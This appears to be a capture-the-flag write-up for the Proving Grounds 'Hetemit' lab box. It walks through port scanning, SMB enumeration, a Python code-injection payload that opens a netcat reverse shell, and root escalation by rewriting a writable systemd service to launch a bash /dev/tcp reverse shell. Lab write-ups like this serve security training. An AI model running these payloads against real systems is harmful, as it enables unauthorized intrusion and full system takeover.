Proving grounds Practice - Hetemit CTF writeup.
NMAP
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 8.0 (protocol 2.0)
80/tcp open http Apache httpd 2.4.37 ((centos))
139/tcp open netbios-ssn Samba smbd 4.6.2
445/tcp open netbios-ssn Samba smbd 4.6.2
18000/tcp open biimenu?
50000/tcp open http Werkzeug httpd 1.0.1 (Python 3.6.8)
21/tcp open ftp vsftpd 3.0.3
anonymous login successfull nothing…
139/tcp open netbios-ssn Samba smbd 4.6.2
445/tcp open netbios-ssn Samba smbd 4.6.2
naveenj@hackerspace:[06:54]~/proving_grounds/Hetemit$ smbclient -L //192.168.201.117/ -N
Anonymous login successful
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
Cmeeks Disk cmeeks Files
IPC$ IPC IPC Service (Samba 4.11.2)
Reconnecting with SMB1 for workgroup listing.
smb: \> ls
NT_STATUS_ACCESS_DENIED listing \*
50000/tcp open http Werkzeug httpd 1.0.1 (Python 3.6.8)
- http://192.168.201.117:50000/verify
naveenj@hackerspace:[06:49]~/proving_grounds/Hetemit$ curl -X POST --data "code=4*4" http://192.168.201.117:50000/verify
16
Vulnerable to command injection
#inject reverse shell
naveenj@hackerspace:[06:49]~/proving_grounds/Hetemit$ curl -X POST --data "code=os.system('nc -e /bin/bash 192.168.45.218 80')" http://192.168.201.117:50000/verify
# netcat listening
naveenj@hackerspace:[06:49]~/proving_grounds/Hetemit$ nc -lvnp 80
listening on [any] 80 ...
connect to [192.168.45.218] from (UNKNOWN) [192.168.201.117] 50652
which python
id
uid=1000(cmeeks) gid=1000(cmeeks) groups=1000(cmeeks)
which python3
/usr/bin/python3
python3 -c 'import pty; pty.spawn("/bin/bash")'
[cmeeks@hetemit restjson_hetemit]$
Initial foothold obtained.
Privilege Escalation
Linpeas Enumeration
╔══════════╣ PATH
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-path-abuses
/home/cmeeks/.rvm/gems/ruby-2.6.3/bin:/home/cmeeks/.rvm/gems/ruby-2.6.3@global/bin:/home/cmeeks/.rvm/rubies/ruby-2.6.3/bin:/home/cmeeks/.local/bin:/home/cmeeks/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/home/cmeeks/.rvm/bin:/home/cmeeks/.rvm/bin
╔══════════╣ Analyzing .service files
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#services
/etc/systemd/system/multi-user.target.wants/pythonapp.service
/etc/systemd/system/multi-user.target.wants/pythonapp.service could be executing some relative path
/etc/systemd/system/multi-user.target.wants/railsapp.service could be executing some relative path
/etc/systemd/system/pythonapp.service
User cmeeks may run the following commands on hetemit:
(root) NOPASSWD: /sbin/halt, /sbin/reboot, /sbin/poweroff
/usr/sbin/suexec = cap_setgid,cap_setuid+ep
╔══════════╣ Permissions in init, init.d, systemd, and rc.d
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#init-init-d-systemd-and-rc-d
You have write privileges over /etc/systemd/system/pythonapp.service
Exploitation
Writing shell to file /etc/systemd/system/pythonapp.service
.
Original content
[Unit]
Description=Python App
After=network-online.target
[Service]
Type=simple
WorkingDirectory=/home/cmeeks/restjson_hetemit
ExecStart=flask run -h 0.0.0.0 -p 50000
TimeoutSec=30
RestartSec=15s
User=cmeeks
ExecReload=/bin/kill -USR1 $MAINPID
Restart=on-failure
[Install]
WantedBy=multi-user.target
Modified Content
[Unit]
Description=Python App
After=network-online.target
[Service]
Type=simple
ExecStart=/home/cmeeks/restjson_hetemit/run.sh #add reverse shell in the bash script
TimeoutSec=30
RestartSec=15s
User=root
ExecReload=/bin/kill -USR1 $MAINPID
Restart=on-failure
[Install]
WantedBy=multi-user.target
run.sh
#!bin/bash
bash -c 'sh -i >& /dev/tcp/192.168.45.218/22 0>&1'
naveenj@hackerspace:[07:28]~/proving_grounds/Hetemit$ nc -lvnp 22
listening on [any] 22 ...
connect to [192.168.45.218] from (UNKNOWN) [192.168.201.117] 39016
sh: cannot set terminal process group (989): Inappropriate ioctl for device
sh: no job control in this shell
sh-4.4#
Root Obtained
References
- https://gist.github.com/A1vinSmith/78786df7899a840ec43c5ddecb6a4740
- https://medium.com/@klockw3rk/privilege-escalation-leveraging-misconfigured-systemctl-permissions-bc62b0b28d49
For more updates and insights, follow me on Twitter: @thevillagehacker.